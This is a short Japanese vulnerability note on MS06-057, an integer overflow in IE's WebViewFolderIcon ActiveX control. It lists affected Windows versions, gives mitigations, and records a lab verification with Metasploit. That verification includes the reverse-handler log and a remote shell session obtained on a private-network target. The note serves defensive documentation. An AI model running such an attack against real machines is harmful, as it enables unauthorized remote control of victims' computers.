MS06-057:Windows Explorer の脆弱性により、リモートでコードが実行される

• 2006/10/05　初版
  • Author grin

• InternetExplorerのWebViewFolderIcon ActiveXコントロールの処理の脆弱性
• WebViewFolderIcon ActiveコントロールからsetSlice()メソッドを呼び出す際に整数オーバフローが発生
• 2006年10月02日現在修正プログラムのリリースはなし
  • 2006年10月11日に修正プログラムが公開された
• この脆弱性を利用した攻撃の報告あり

• Microsoft Windows 2000 Service Pack 4
• Microsoft Windows XP Service Pack 1 および Microsoft Windows XP Service Pack 2
• Microsoft Windows Server 2003 および Microsoft Windows Server 2003 Service Pack 1
• Microsoft Windows XP Professional x64 Edition
• Microsoft Windows Server 2003 for Itanium-based Systems、Microsoft Windows Server 2003 with SP1 for Itanium-based Systems、および Microsoft Windows Server 2003 x64 Edition

• Microsoft::マイクロソフト セキュリティ アドバイザリ (MS06-057)
• JVN

• Metasploit Framework にて検証

• Windows XP SP2(フルパッチ)日本語版

• 攻撃先IPアドレス: 192.168.0.100
• 攻撃元IPアドレス: 192.168.0.10
• 攻撃先PCのIEで攻撃元PCの80番ポートへアクセスする受動的攻撃にてリバースコネクトを行う

[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.0.10:80/
[*] Client connected from 192.168.0.100:1865...
[*] Got connection from 192.168.0.10:4321 <-> 192.168.0.100:1866

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\diag\デスクトップ>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter ローカル エリア接続:

        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 192.168.0.100
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.0.1

• 上記のように攻撃先PCのシェルを取得することに成功。

• 2006年10月02日現在、修正プログラムがリリースされていないので、以下は暫定的処置

1. レジストリの設定より、ActiveXを無効にする(Internet Explorer で ActiveX コントロールの動作を停止する方法を参照)
2. 非公式パッチの適用（ZERT）